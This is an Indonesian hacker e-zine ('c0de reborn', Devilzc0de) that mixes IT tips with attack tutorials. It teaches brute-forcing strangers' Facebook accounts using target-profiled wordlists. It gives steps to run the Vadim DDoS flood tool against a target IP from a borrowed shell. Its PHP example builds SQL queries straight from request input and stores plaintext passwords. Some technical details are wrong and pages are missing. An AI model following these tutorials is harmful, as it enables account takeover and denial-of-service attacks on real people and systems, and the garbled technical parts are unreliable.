Micro Tik
Micro Tik
Kata Pengantar
E-Zine berjudul c0de reborn ini memuat berbagai tutorial dan bahasan santai dari dunia IT sebagai kerangka atau
pendekatan bagi perkembangan motivasi dengan tekanan pada konteks pembelajaran.
E-Zine ini diharapkan dapat berguna terutama bagi pembaca yang menekuni bidang tersebut, baik sebagai
pembuat, analis, periset, ataupun yang memiliki ketertarikan dengan isu yang dibahas.
Untuk maksud tersebut, Bahasan akademis yang mendalam bukan tujuan E-Zine ini. Sebaliknya, diskusi yang
disampaikan juga tidak diarahkan untuk mengupas materi-materi khusus secara spesifik.
Beberapa contoh selektif disampaikan lebih untuk memberikan gambaran dan memperkaya pemahaman berkaitan
dengan topik yang diangkat.
Tak berlebihan untuk ditekankan bahwa isi E-Zine ini sebagian besar lebih merupakan ringkasan tentang konsep,
metode dan beberapa kasus praktik selektif dalam konteks pengembangan minat dan motivasi rekan-rekan semua
dalam dunia IT.
Kesadaran kita yang kini makin berkembang terhadap dunia IT mendorong kita untuk lebih mendalami dalam
konteks mencari sesuatu yang baru, maka diperlukan apa yang dinamakan kerjasama dan saling berbagi dan hal ini
menjadikan sebuah komunitas yang didasari Persahabatan yang baik dan merasa terikat satu dengan yang lainnya
untuk maju dan terus berkarya dalam bidangnya masing-masing.
Walaupun bahasan dalam "c0de reborn" ini bersifat sederhana, diskusi yang disajikan diharapkan dapat menambah
wawasan dan memicu minat rekan-rekan semua dalam mendalami nya.
Dengan segala keterbatasan, team Redaksi menyadari bahwa masih demikian banyak isu yang terabaikan dan/atau
dibahas hanya selintas dalam E-Zine kali ini.
Untuk pendalaman lebih lanjut, khususnya menyangkut topik maupun contoh-contoh spesifik, rekan-rekan semua
disarankan mempelajari dan membahasnya di Forum yg kita sediakan.
Kerjasama yang baik antara Pengurus dengan kawan-kawan Anggota Devilzc0de dan peran banyak pihak sangat
berjasa atas terbitnya "c0de reborn" ini.
Sehubungan dengan itu, Segenap Pengurus menyampaikan terima kasih dan penghargaan setulus-tulusnya kepada
rekan-rekan di Redaksi dan para Penulis serta rekan-rekan anggota Devilzc0de sekalian, terutama yang telah
memberikan kritikan dan saran serta menggunakannya sebagai salah satu bahan dalam diskusi-diskusi baik di Forum
maupun lainnya.
Penulis menyadari bahwa buku ini masih jauh dari sempurna. Karena itu, kritik dan saran membangun akan
senantiasa penulis hargai setulusnya.
Semangat yang menjiwai terbit nya "c0de reborn" ini adalah menjadikan pengembangan minat dan motivasi sebagai
wadah untuk lebih meningkatkan kemajuan kita bersama. Dengan semata mengharap ridho Tuhan Yang Maha Esa
dan memanjatkan puji syukur atas kebesaran dan kemurahan NYA, Kami segenap team Redaksi dan Pengurus
berharap semoga "c0de Reborn" ini dapat bermanfaat, dan bisa menyatukan kita semua.
Hal 1
c0de reborn
Daftar Isi
Kata Pengantar ........................................................................................................................................................... 1
Daftar Isi ..................................................................................................................................................................... 2
Hacking Finger Print ................................................................................................................................................... 3
Hack Facebook............................................................................................................................................................ 9
Model View Controller ............................................................................................................................................. 13
Optimasi System dan Desktop Ubuntu .................................................................................................................... 18
Teknik Mempercepat Akses Modem Flash .............................................................................................................. 24
Teknik Backup Konfigurasi Mikrotik (Full Trick) ................................................................................................... 28
DDOS Attack menggunakan Vadim .......................................................................................................................... 31
Routing Simulasi Ip Dengan Paket Tracer Beserta Pembelajaran Ip Address .......................................................... 33
Refleksi Wikileaks: Hacktivism dan Politik Global .................................................................................................... 41
Menyisipkan Backdoor ke Source Code Daemon pure-ftpd-1.0.29 ......................................................................... 45
Phishing Tutorial ....................................................................................................................................................... 51
Nonton Video di Youtube Pake HTML5 .................................................................................................................... 54
Folder Lock Decryptor menggunakan VB6 ............................................................................................................... 57
Memahami Dan Mendamaikan Peperangan Script jQuery...................................................................................... 64
Cisco Internetwork Operating Systems Emulator .................................................................................................... 69
Penulis Artikel ........................................................................................................................................................... 73
Penutup .................................................................................................................................................................... 74
Hal 2
c0de reborn
AC 102
Pilihan yang tepat bagi perusahaan yang hanya membutuhkan fitur - fitur standar untuk menggantikan mesin amino
anda, tanpa mengurangi manfaat tambahan dari system absensi yang terkomputerisasi yang bisa ditawarkan oleh
sebuah mesin absensi sidik jadi.
Cocok digunakan di kantor , sekolah , dan bidang usaha lain.
Spesifikasi :
1500 template jari
100.000 record data
Penarikan data dengan TCP/IP
Langkah pertama adalah kita harus punya software resmi dari vendor untuk diinstall ke komputer kita. Dan ini bisa
kita dapatkan dari situs resminya. Tergantung seri perangkat kita berapa :
http://fingertec-tcms.software.informer.com/
Hal 3
c0de reborn
Installasi Software
Masukkan CD Installer TCMS V2 ke dalam CD Rom. Program Autoplay.
Ikuti langkah-langkah installasi.
Setelah finish, buka software TCMS didesktop
Hal 4
c0de reborn
Masukkan kunci produk yang ada di stiker yang tertempel di CD Installer. Lalu klik berikutnya.
Hal 5
c0de reborn
Tentukan nama-nama jenis hari. Biasanya langsung dibikin default. Lalu klik berikutnya.
Tentukan jadwal utama. Kita bisa mengeset sekarang atau nanti ketika installasi sudah selesai. Lalu klik berikutnya.
Lalu masukkanlah password untuk buka software (jika diperlukan), dan identitas perusahaan. Lalu, klik berikutnya
Hal 6
c0de reborn
Klik selesai.
Isikanlah settingan.
ID : Nomer Mesin (Dev Number) diisi dengan 1
Model : Sesuaikan dengan seri mesinnya.
Sesuaikan metode sambungan. Isikan TCP/IP
Sesuaikan baudrate. Defaultnya adalah 115200
Sesuaikan IP Address yang ada di mesin. Untuk melihat IP Mesin, caranya tekan menu-pilihan-comm opt-IP address.
(biasanya 192.168.0.201)
Isikan pada kolom alamat IP Address
Pastikan antara mesin dan PC sudah terkoneksi, lalu hilangkan tanda centang kiri atas.
Masukkan kunci aktivasi yang tercetak di stiker yang tertempel di Buku Manual. Klik terapkan, Oke, lalu klik
terapkan.
Hal 7
c0de reborn
Seperti yang bisa dilihat diatas, apabila pada kolom hak khusus ada yang bukan user, bisa supervisor, admin, atau
enroller, maka di klik saja diganti user,
Lalu di klik update pengguna, semua-beri centang 2 dibawahnya, lalu terapkan.
Setelah update selesai, coba tekan menu di mesin absen, seharusnya sudah tidak terkunci
Selamat mencoba
Semoga berhasil
Terimakasih kepada seluruh komunitas security di Indonesia, dan kepada seluruh saudaraku semua.
Dan whitecyber team di seluruh dunia
Salam Maiyah Indonesia
Universe Khalifatulloh Security
Hal 8
c0de reborn
Hack Facebook
Untuk pertama kalia saya mencoba menulis sebuah artikel cupu ini buat DC tercinta. Dikarenakan DC mau bikin EZine keduaa, saya sebagai Devilzc0der yang sudah belajar banyak di forum ini mau tidak mau harus setidaka
menyumbangkan secuir artikel. Walaupun sebenara bingung juga mesti apa yang harus saya tulis. Soala saya kan
Nyubi kelas beratttttttt.
Akan tetapi, daripada tidak sama sekali sebaika berusaha sekuat tenaga untuk bisa menyumbangkan ilmu yang saya
bisa.
Kali ini saya akan mencoba menulis bagaimana kita mendapatkan account Facebook orang lain. Lebih jelasa
bagaimana kita melakukan Brute Force ke Facebook target kita. Bagi temen-temen yang belum tau apa itu Brute
Forcer bisa baca di http://id.wikipedia.org/wiki/Brute_force.
Oke kita langsung saja ke TKP, disini saya menggunakan OS Microsoft Windows XP SP2 :
Kita musti menginstal dulu software Python yang dapat di download di
http://www.python.org/ftp/python/2.7/python-2.7.msi
Ada juga module tambahan yang mesti kita Install, modulea dapat di download di
http://wwwsearch.sourceforge.net/mechanize/src/mechanize-0.2.2.zip
Mungkin bagi temen-temen yang masih bingung cara Install modulea, saya akan mencoba membantu bagaimana
kita melakukan Install module tambahana. Kenapa saya harus jelaskan ini? Karena pas waktu pertama kali saya coba
install modulea ternyata gak seperti software atau tool-tool yang laina. Ini agak sedikit berbeda karena
menggunakan perintah CMD. Oke di lanjut Gan..
Module yang sudah kita download di Extrak dulu, kemudian Rename menjadi Folder m
Simpan Folder di Drive C:\
Hal 9
c0de reborn
Masuk ke CMD, Start --> Run --> Ketikan cmd --> Enter
Sekarang kita mulai melakukan Install modulea. Masih dalam CMD, kita harus masuk dulu ke directory dimana kita
menyimpan file-file modulea. Caraa ketikan ini pada CMD :
cd c:\m --> Enter
setup.py install --> Enter
Module sudah berhasil kita Install. Explorer lagi masih dalam folder C:\m, cari folder mechanize di C:\build\lib
lalu pindahkan ke folder C:\Python27\lib.
Hal 10
c0de reborn
Sebelum kita menggunakan toola, kita harus punya dulu kamus passworda. Caraa sangat mudah, disini kita
dituntut harus mampu melakukan Social Engineering. Kita mesti tahu dulu target kita itu siapa, kapan tanggal lahira,
apa warna kesukaana, kapan tanggal jadian sama pacara dan masih banyak yang laina. Karena menurut
pengalaman saya selama ini, mereka membuat password tidak jauh-jauh dari hal yang di sebutkan barusan.
Sekarang password sudah kita kumpulan, selanjuta simpan kumpulan password itu dalam notepad dan save dengan
nama wordlist.txt.
Hal 11
c0de reborn
Hal 12
c0de reborn
Mengapa memilih menggunakan pemrograman procedural ? karena goal artikel yang saya tulis ini adalah
agar temen-temen bisa tahu MVC itu seperti apa, mengapa, dan bagaimana.
Ok,sebelum memulai semuanya, pastikan dulu buat database dengan struktrur dan data (opsional) seperti ini:
CREATE TABLE `model_view_controller` (
`id` tinyint(2) NOT NULL auto_increment,
`user` varchar(40) NOT NULL,
`password` varchar(40) NOT NULL,
`nama` varchar(40) NOT NULL,
`alamat` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=3 ;
INSERT INTO `model_view_controller` VALUES (1, 'kiddies', 'kiddies_123', 'kiddies', 'Devilzc0de');
INSERT INTO `model_view_controller` VALUES (2, 'ketek', 'ketek_456', 'ketek', 'Devilzc0de');
Hal 13
c0de reborn
Hal 14
c0de reborn
view_update.php
<?php
include ('ini.php');
$query="select * from model_view_controller where id='$_GET[id]'";
$view=mysql_query($query);
$tampil=mysql_fetch_array($view);
echo "
<form action=model.php?exe=update method=post>
<table width=241 height=144 border=1 align=center>
<tr><td colspan=3 align=center>Update</td></tr>
<tr><td width=72>User</td> <td width=3>:</td> <input type=hidden name=id id=hiddenField value=$tampil[id] />
<td width=144><input type=text name=user id=user value=$tampil[user] /></td></tr>
<tr>
<td>Password</td> <td>:</td>
<td><input type=text name=password id=password value=$tampil[password] /></td>
</tr>
<tr><td>Nama</td> <td>:</td> <td><input type=text name=nama id=nama value=$tampil[nama] /></td></tr>
<tr><td>Alamat</td> <td>:</td> <td><input type=text name=alamat id=alamat value=$tampil[alamat] /></td>
</tr>
<tr><td colspan=3><input type=submit name=button3 id=button3 value=Submit />
<input type=reset name=update id=button4 value= Reset /></td>
</tr>
</table>
</form> ";
?>
View_laporan.php
<?php
include ('ini.php');
echo "
<table width=50% border=1 align=center>
<tr>
<td>ID</td> <td>User</td> <td>Password</td> <td>Nama</td> <td>Alamat</td> <td align=center>Edit ||
Delete</td>
</tr>";
$query=('select * from model_view_controller order by id');
$view=mysql_query($query);
while ($tampil=mysql_fetch_array($view)
{
echo"
<tr>
<td>$tampil[id]</td>
<td>$tampil[user]</td>
<td>$tampil[password]</td>
<td>$tampil[nama]</td>
<td>$tampil[alamat]</td>
<td align=center>
<a href=controller.php?page=view_update&id=$tampil[id]>Edit</a> || <a
href=model.php?exe=delete&id=$tampil[id]>Delete</a></td>
</tr>";
}
echo"
</table>
";
?>
Hal 15
c0de reborn
Penjelasan : file view.php bertugas untuk menampilkan form insert data, view_upate.php bertugas untuk
menampilkan form update sebuah data (yang telah dipilih sebelumnya) dan file view_laporan.php berisi
laporan dari database yang dimaksud.
Lalu kita buat file dengan nama model.php
<?php
include ('ini.php');
$exe=$_GET['exe'];
$user=$_POST['user'];
$password=$_POST['password'];
$nama=$_POST['nama'];
$alamat=$_POST['alamat'];
$id=$_POST['id'];
if ($exe=='insert'){
$query="INSERT INTO model_view_controller VALUES (NULL , '$user', '$password', '$nama', '$alamat')";
$insert=mysql_query($query);
if (!empty($insert))
{
echo "
<script>
alert('Data Berhasil Disimpan');
top.location=('view.php');
</script>
";
}
else{
echo "
<script>
alert('Data Gagal Disimpan');
top.location=('view.php');
</script>
";
}
}
//update
if ($exe=='update')
{
$query="UPDATE model_view_controller SET user = '$user', password = '$password',nama = '$nama', alamat =
'$alamat' WHERE id ='$id' ";
$update=mysql_query($query);
if (!empty($update))
{
echo "
<script>
alert('Data Berhasil Diupdate');
top.location=('view.php');
</script>
";
}
else{
echo "
<script>
alert('Data Gagal Diupdate');
top.location=('view.php');
</script>
";
}
}
Hal 16
c0de reborn
//delete
if ($exe=='delete')
{
$query="delete from model_view_controller where id='$_GET[id]'";
$delete=mysql_query($query);
if (!empty($delete))
{
echo "
<script>
alert('Data Berhasil Didelete');
top.location=('view.php');
</script>
";
}
else
{
echo "
<script>
alert('Data Gagal Didelete');
top.location=('view.php');
</script>
";
}
}
?>
Penjelasan : sesuai dengan teori yang dijelaskan diatas bahwa file model inilah yang menangi akses (query)
ke database. Yaitu dengan melakukan pengecekan terhadap isi $exe dan kemudian program akan
menempatkan kebagian mana isi $exe akan ditindak lanjuti.
Kesimpulan :
Metode pengembangan web dengan konsep MVC akan sangat membantu jika digunakan dalam skala besar.
Penggunaan pemrograman procedural kurang efektif jika diterapkan pada MVC. Jika saya diizinkan nulis
lagi, saya pengin nulis kelanjutan dari file ini dengan judul OOP dengan MVC. Diizinkan nggak neh om
admin n moderator ?
referensi
teori, gambar : id.wikipedia.org/wiki/MVC
salam
gr.^c0d3,
kritik dan saran silahkan dilayangkan ke [email protected] (http://greenc0d3.wordpress.com)
Thanks to :
Allah SWT, Muhammad SAW
My family, Ketek, kiddies, (post reply kalian, menguatkan saya untuk mulai menulis ), netheroes.org, all member
devilzc0de.org (saya merasa nyaman berada disini)
Hal 17
c0de reborn
Hal 18
c0de reborn
Mempercepat Booting
a. Optimasi Processor Dual Core
Apabila anda memiliki computer dengan kapasitas processor dual core, anda bias memanfaatkan untuk proses
booting agar lebih cepat.
Buka terminal anda, dan kemudian edit file rc dengan perintah: $ sudo gedit/etc/init.d/rc/
Cari baris CONCURRENCY=none kemudian ganti dengan CONCURRENCY=none
Keterangan: Concurrency sendiri artinya melakukan bersama-sama, dalam hal ini proses booting akan dilakukan
bersamaan oleh dua processor tersebut sehingga bisa lebih cepat.
b. Menggunakan Paket Preload
Preload adalah paket yang digunakan untuk mengoptimalkan proses booting dan startup sebuah
aplikasi, berikut cara installasi paket preload: $ apt-get install preload
Setelah paket terinstall, maka dengan otomatis paket akan berjalan dengan sendirinya, anda tidak
perlu melakukan konfigurasi apapun, karena developernya telah mengoptimasikan preload tersebut. Atau apabila
anda ingin mengetahui buka file konfigurasinya di: $ sudo gedit /etc/preload.conf
Berikut ini contoh isi file preload.conf:
Option
Default
Controls
Cache model (system) settings
model.cycle
20 [seconds]
How often Preload will query your system to update it's model about programs and libraries to cache.
model.halflife
168 [hours]
How often Preload will begin to "forget" about old data; for each halflife, the statistical relevance of the current
model loses 50% of its importance.
model.minsize
2000000 [bytes]
The minimum amount of system calls an application makes for it to be considered by Preload. A smaller number will
mean Preload caches smaller applications, while to make Preload cache only larger applications, increase this
number.
Memory settings
The formula used to determine the maximum available memory available to Preload is:
(Total RAM x model.memtotal) + (RAM available at start x model.memfree) + (Cached memory x model.memcached)
model.memtotal
-10%
model.memfree
100%
model.memcached
30%
Dan untuk memantau atau memonitoring aktivitas preload, anda dengan mudah dapat melihat lognya, dengan
perintah berikut: $ tail f /var/log/preload.log
Menggunakan preload dapat mengoptimalkan waktu startup system anda. Karena kebanyakan komputer saat ini
memiliki RAM yang besar, preload memanfaatkan RAM ini untuk digunakan secara optimal.
Hal 19
c0de reborn
Hal 20
c0de reborn
Mematikan Animasi
Pada saat anda meminimize aplikasi, biasanya muncul animasi minimize sebelum aplikasi turun ke taksbar, nah
untuk menghilangkan animasi tersebut, anda bisa dengan mudah mensetting melalui aplikasi gconf-editor. Untuk
cara-caranya sebagai berikut:
1. Tekan tombol Alt+F2 dan kemudian ketikkan gconf-editor
2. Setelah itu, Pili apps/metacity/general
Hal 21
c0de reborn
Catatan: Jika menghilangkan animasi ini akan berdampak pada hilangnya animasi pada saat menggerakkan window,
yang tampak menjadi sebuah kotak ketika window tersebut digerakkan.
Selain itu opsi lainnya untuk menbuat centeng desktop diantaranya (gunakan dengan hati-hati) :
/apps/metacity/general/compositing_manager disetel ke False, non aktifkan bayangan di bawah jendela
/desktop/gnome/interface/enable_animations mirip dengan yang di atas
/desktop/gnome/interface/menus_have_icons matikan ikon pada menu
/apps/panel/global/keep_menus_in_memory
/apps/panel/global/disabled_applets
/apps/panel/global/tooltips_enabled
/desktop/gnome/sound/event_sounds
Mengamankan Desktop dengan Menggunakan Paket Pessulus ( Lockdown Editor ). Untuk menjaga tampilan panel
pada desktop agar tidak berubah, anda dapat dengan mudah menggunakan paket pessulus.
1. Intallasi dengan perintah: $ apt-get install pessulus
2. Kemudian jalankan dengan cara mengklik menu System Administration Lockdown Editor
Hal 22
c0de reborn
Catatan: Tujuan utama script deepfreeze ini sebetulnya adalah mengembalikan konfigurasi home user yang sudah
dibackup sebelumnya. Konfigurasi tersebut sudah dibuat dalam bntuk tar-ball yang kemudian diekstrak kembali
ketika gdm (gnome desktop) berhenti.
Backup konfigurasi home dari user yang sudah dibuat dalam bentuk tarball (.tar.bz2) di simpan di /root. Kemudian
script deepfreeze tersebut ditaruh di /etc/init.d/gdm di bagian stop sehingga ketika gdm dimatikan script ini bekerja
dan mengembalikan konfigurasi ke semula.
Mudah bukan, untuk mengoprek system Linux, tidak jauh halnya dengan cara mengoprek system Windows, semua
itu mudah asalkan ada kemauan.
Semoga tutorial ini dapat bermanfaat bagi seluruh bangsa indonesia khusunya, sekian dari saya,
Hal 23
c0de reborn
Hal 24
c0de reborn
4. Konfigurasi modem yang sudah terinstall tadi,Modem-Heier USB Modem dengan port COM6 klik Configure
5. Sorot pada maximum speed (satuan bps), di bawah tertera 115200 default
Hal 25
c0de reborn
6. Setelah itu, kita ganti satuan bps 115200 menjadi yang paling besar, disini yang paling besar adalah 921600
8. Setelah semua selesai, kemudian kita lakukan koneksi ke internet, dengan cara mengeklik, StartAll
ProgramsCM300 Data Card, setelah itu klik Connect Network
Hal 26
c0de reborn
9. Berikut ini Screen Shoot sebelum di konfigurasi, dan saya test untuk download di server http://mediafire.com
dengan besar file 6.0 mb dengan kecepan 4,6 kb/s.
Keterangan:
1. pada pojok kanan bawah, itu adalah test dengan cFosSpeed, untuk mengetahui kekuatan upload,download,dan
browser.
2. pada menu ceria, untuk keterangan data send adalah 717,45 kb dan untuk data receive 5501,85 kb
10. Berikut Screen Shoot kecepan download,upload, dan browser setelah dikonfigurasi:
Keterangan:
1. Kecepatan download file pada server http://sampoernatelekom.com , saya mencoba download software
FWT_2058 dengan besar 10.5 mb dengan kecepan 5.7 kb/s.
2. Dan saya download lagi software FWT_2052 dengan besar 14,2 mb dengan kecepan 5,5 kb/s. Cukup cepat sekali
saya untuk download file-file diatas. Dan sebelumnya saya sudah download beberapa file.
Cukup sekian dari penjelasan saya tentang trik atau cara mempercepat akses modem flash, mudah-mudahan tutorial
saya kali ini dapat bermanfaat bagi semua.
Hal 27
c0de reborn
Router akan restart dan file backup akan menggantikan konfigurasi sebelumnya.
Hal 28
c0de reborn
3. Run backup_mail
3. Cek mailbox, jika file masuk berarti proses backup dengan menggunakan script sudah berhasil.
4. Selesai
Hal 29
c0de reborn
Catatan:
1. Nama backup dari router system dilengkapi tanggal dan waktu.
2. Diasumsikan smtp mail sudah dibuat dan proses kirim email dilakukan ke alamat ; [email protected]
3. Setelah proses pengiriman email berhasil, beri waktu router 10 detik dan secara otomatis menghapus file backup
yang dibuat untuk menghemat space di router.
4. Katakan ke system log bahwa proses send email sudah berhasil.
Sekian, semoga apa yang menjadi bahan tutorial ini dapat bermanfaat bagi semua.
Contact Person:
E-mail: [email protected]
Blog: http://wahyu-note.blogspot.com
Ym: wahyu05111991
Wassalamualaikum.
Hal 30
c0de reborn
Langkah Pertama :
Download file Vadim : http://www.ziddu.com/download/10782940/vadim.tar.gz.html
Langkah Kedua :
Upload Vadim yg sudah di download tadi ke Shell kalian. Kalo belum punya shell. silahkan minta ke temen.
Shell harus dalam keadaan safemode Off, chmod permissionnya disetting 777 artinya kita mampu melakukan aksi
baca, tulis dan eksekusi terhadap file tersebut.
Langkah Ketiga :
Ekstrak file Vadim menggunakan perintah --> tar -zxvf vadim.tar.gz Klik go
Screenshoot'y kek gini :
Setelah di ekstrak, nanti akan tercipta sebuah folder nama folder'y [Dos]. Setelah itu Klik folder tersebut. Kita
masuk ke directory nya.
Hal 31
c0de reborn
Langkah Keempat :
Setelah semuanya siap, ketik ini ./vadimI [iptarget] [port] [jumlah paket]
Contoh : ./vadimI 111.111.111.111 80 9999999999999999999999 Klik go
Screenshoot :
Thankz To :
Whitehat, Petimati, El Nino, Chaer Newbie, Kiddies, Id03y, Cruzenaldo, Gunslinger, Mywisdom, Sudden_death,
Wahyu_devilzc0de, blu3k1d5, d4y4x, Wenkhairu and all Familys devilzc0de
Hal 32
c0de reborn
http://www.4shared.com/file/58427655/5fe397c1/Packet_Tracer_50___1-2.html?s=1
Hal 33
c0de reborn
First Step
1. Setting Router
Hal 34
c0de reborn
Hal 35
c0de reborn
Hal 36
c0de reborn
klo semua kabel nya udah hijau.. berarti dah sukses.. tinggal ping aja IP Addressnya..
selamat mencoba.. walau hanya sederhana.
tambahan lagi kaka.. ada ilmu dikit lagi nih.. ane share iia
Disini saya pasang 3 buah server.. Sever DNS, WEB dan DHCP
dan 3 buah PC di kasih DHCP aja untuk cabang surabaya
1. Setting Server DNS
IP Address : 172.16.40.1
Subnet Mask : 255.255.0.0
Default Gatway : 172.16.40.254
DNS : 172.16.40.1
Service HTTP = Off
Service DHCP = Off
Service TFTP = Off
Setting DNS = On
- Domain Name= www.jancok.com
- Ip Address= 172.16.40.2
2. Setting Server WEB
IP Address : 172.16.40.2
Subnet Mask : 255.255.0.0
Default Gatway : 172.16.40.254
DNS : 172.16.40.1
Service HTTP = On
Service DHCP = Off
Service TFTP = On
Setting DNS = Off
3. Setting Server DHCP
IP Address : 172.16.40.3
Subnet Mask : 255.255.0.0
Default Gatway : 172.16.40.254
DNS : 172.16.40.1
Service HTTP = Off
Service DHCP = On
- Start IP Address : 172.16.40.10
- Max. Number of User : 100
Service TFTP = Off
Setting DNS = On
Hal 37
c0de reborn
IPV4 itu yang terdiri dari 4 segment xxx.xxx.xxx.xxx = 32 bit dimana 1 segment = 1byte = 8bit
nilai total dari masing2 segment adalah 255 itu diambil dari perpangkatan 2 pangkat bilangan dari 0-7
nilainya 128+64+32+16+8+4+2+1= 255 bila nilai 255 maka nilia bit persegment = 1 1 1 1 1 1 1 1
misal IP 192.168.10.1 / 24 maka nilai IP segment pertama : 1 1 0 0 0 0 0 0 . 1 0 1 0 1 0 0 0 . 0 0 0 0 1 0 1 0 .
0 0 0 0 0 0 0 1 192 . 168 . 10 . 1
dan / 32 adalah subnet masknya dari jumlah bitnya.. 1 1 1 1 1 1 1 1 . 1 1 1 1 1 1 1 1 . 1 1 1 1 1 1 1 1 . 0 0 0 0
0 0 0 0 255 . 255 . 255 . 0
IP address
class A, range 1-126, IP Private 1.0.0.1 s/d 126.255.255.254, subnet mask 255.0.0.0
class B, range 128-191, IP Private 128.0.0.1 s/d 191.255.255.254, subnet mask 255.255.0.0
class C, range 191-223, IP Prvate 191.0.0.1 s/d 223.255.255.254, subnet mask 255.255.255.0
nb :
IP 127.0.0.1 itu untuk IP loopback/ localhost
IP 0.0.0.0 dan 255.255.255.255 untuk broadcast
untuk class D dan E yang mensimulasikan server DNS untuk cabang surabaya dah jarang di gunakan, jadi
yang ini aja ya
Hal 38
c0de reborn
contoh :
IP class A, misal : 100.10.10.1
maka subnet mask : 255.0.0.0
IP class B, misal : 172.16.10.1
maka subnet mask : 255.255.0.0
IP class C, misal : 192.168.10.1
maka subnet mask : 255.255.255.0
SUBNETTING
rumus:
1. Mencari IP Pertama = 265-jumlah nilai range terakhir
2. Jumlah Network ID = 2^x-2 dimana, x = nilai bit pada segment terakhir yang bernilai 1
3. Jumlah Host ID = 2^y-2 dimana, y= nilai bit pada segment terakhir yang bernilai 0
defaut subnet:
/8 = 255.0.0.0
/16 = 255.255.0.0
/24 = 255.255.255.0
dimana subnetting hanya menentukan jumlah dari Network ID dan Jumlah Host ID
Hal 39
c0de reborn
Hal 40
c0de reborn
Hal 41
c0de reborn
Hacktivism adalah suatu kepedulian politik aktivis cyber yang dibangun atas kesadaran para pelakunya. Pola gerak
para aktivis-aktivis cyber tersebut selain dilandasi prinsip dasar seorang hacker tentang kebebasan juga pengetahuan
dan wawasan mereka mengenai konstalasi politik global. Melalui The Hacktivismo Declaration cDc menegaskan
we will study ways and means of circumventing state sponsored censorship of the Internet and will implement
technologies to challenge information rights violations.
THAT STATE-SPONSORED CENSORSHIP OF THE INTERNET IS A SERIOUS
FORM OF ORGANIZED AND SYSTEMATIC VIOLENCE AGAINST CITIZENS, IS
INTENDED TO GENERATE CONFUSION AND XENOPHOBIA, AND IS A
REPREHENSIBLE VIOLATION OF TRUST.
(Hacktivismo and Cult of the Dead Cow 2001)
Hackers Convictions dan Kontroversinya
Sebelum publik jauh menterjemahkan hacktivism dalam prakteknya penting untuk kembali kepada pemahaman
dasar tentang aktivitas hackers dan prinsip-prinsip yang mereka yakini, mempertimbangkan arus informasi yang
sampai kepada kalangan publik tidak selamanya dapat dibenarkan. Ada satu hal yang menggelitik ketika dalam
sebuah wawancara online dengan Al-Jazeerah, seorang professor Jurnalistik di Mesir menyebut hacker sebagai a
semi-criminal. Pandangan seperti inilah yang umum sampai kepada telinga masyarakat, padahal sesungguhnya
hacker adalah hacker, seseorang yang memahami komputer dan jauh mengeksplorasi pengetahun dan keahliannya
untuk menemukan solusi bagi masalah-masalah teknis. Mereka dapat menjadi kriminal jika melakukan aksi-aksi
kriminal, sama halnya dengan professor atau dokter yang juga dapat menjadi kriminal jika melakukan aksi-aksi
kriminal. Satu prinsip penting hackers dalam aktivitas-aktivitas mereka adalah bahwa mereka meyakini tentang
peran krusial mereka sebagai promotor kebebasan informasi melalui dunia cyber. Peran ini lah yang kadang
menjerumuskan hackers kedalam aksi kriminal sebagaimana dalam aktivitas hacktivism yang dapat digolongkan atas
legal dan illegal.
Legal atau illegalnya aksi hacking komputer memang masih sebuah isu bergerak dalam dunia maya dan real, dimana
upaya mengkodifikasi hukum-hukum cyber masih terus menuai kontroversi ketika bersentuhan dengan prinsip
kebebasan informasi dan berekspresi. Namun demikian dalam pandangan dasarnya aksi-aksi hacktivism berupa site
defacement, Denial of Service (DoS) sampai political cracker berupa perusakan website misalnya digolongkan illegal
karena sifatnya yang merusak dan merugikan korban. Sementara virtual sit-ins digolongkan aksi legal yang lebih
bersifat persuasif dengan melibatkan pengguna-pengguna internet secara global sebagai bentuk kesadaran pribadi.
Aksi virtual sit-ins dianggap merefleksikan prinsip demokrasi dalam dunia maya, dimana para pengguna internet
diundang untuk turut mendukung satu aksi hacktivism seperti melakukan vooting politik.
Ide-ide dasar aktivitas hacktivism sesungguhnya adalah tentang kebebasan berekspresi, memperoleh informasi,
memperjuangkan hak asasi manusia (HAM), hingga mempromosikan satu pandangan politik individu atau kelompok.
Bagi hacktivist, setiap aksi yang mereka lakukan dilandasi oleh prinsip-prinsip kemerdekaan yang mereka yakini
sebagaimana Steven Levy dalam bukunya Hackers (1984): informasi harus bebas, menolak otoritas dan
mempromosikan prinsip distribusi. Dalam the Concience of Hackers, the Mentor yang dikenal sebagai bapak hacker
sudah terlebihdahulu mempromosikan pembelaan atas aktivitas hacker dan tuduhan kriminalitas. Manifesto yang
dicetuskan tersebut sangat bernuansa pemberontakan terhadap kenyataan dunia modern.
.tapi bagi kalian kami penjahat. Kami adalah penjahat, sedangkan kalianlah yang membuat bom nuklir,
mengobarkan peperangan, membunuh, berbuat curang, berbohong, dan berusaha membuat kami percaya bahwa
itu semua demi kebaikan kami. Ya aku adalah penjahat. Kejahatanku adalah keingintahuanku. Kejahatanku adalah
menjadi lebih pintar dari kalian, sebuah dosa yang tidak akan bisa kalian ampuni Kau bisa menghentikan satu, tapi
kau tak akan bisa menghentikan semuanya....
Sementara manifesto of hackers versi Mckenzie Wark menekankan whatever code we hack, we create the
possibility of new things entering the world. Aktivitas hacking memang secara umum melahirkan trobosan-trobosan
baru dalam dunia komputer dan internet, namun bagi sebagian kalangan kondisi tersebut mengacu kepada apa yang
disebut kebablasan teknologi. Dengan menggunakan pendekatan filsafat misalnya, A Question about Technology
sebuah literatur paling populer dalam memahami kemajuan teknologi dengan pendekatan filsafat. Dalam buku yang
sering menjadi referensi tersebut, Heiddeger sang filsuf abad modern melihat kemajuan teknologi sebagai sebuah
sinyal yang menghancurkan batas-batas kemanusiaan, atau dalam istilah Borgmann komputer sebagai produk
hyperintelligen. Namun demikian persoalan apakan aktivitas komputer dan penggunanya sudah melampaui batas-
Hal 42
c0de reborn
batas moral-kemanusian sesungguhnya adalah sesuatu yang begitu abstrak untuk dijelaskan ketika mereka
bersentuhan dengan politik, sama halnya dengan politik itu sendiri.
Ted Julian dari Yankee Group menilai perkembangan hacktivism melalui sepenggal kalimatnya "when we look back
years from now we'll see this as a tipping point in 'hactivism' going from largely a theoretical threat to something
that's more a day-to-day issue." Sementara jika aksi-aksi aktivis cyber bagi beberapa kalangan dinilai sebagai bentuk
aksi terrorisme, Conway berargumentasi:
Hacktivists, although they use the Internet as a site for political action, are not cyberterrorists either. They view
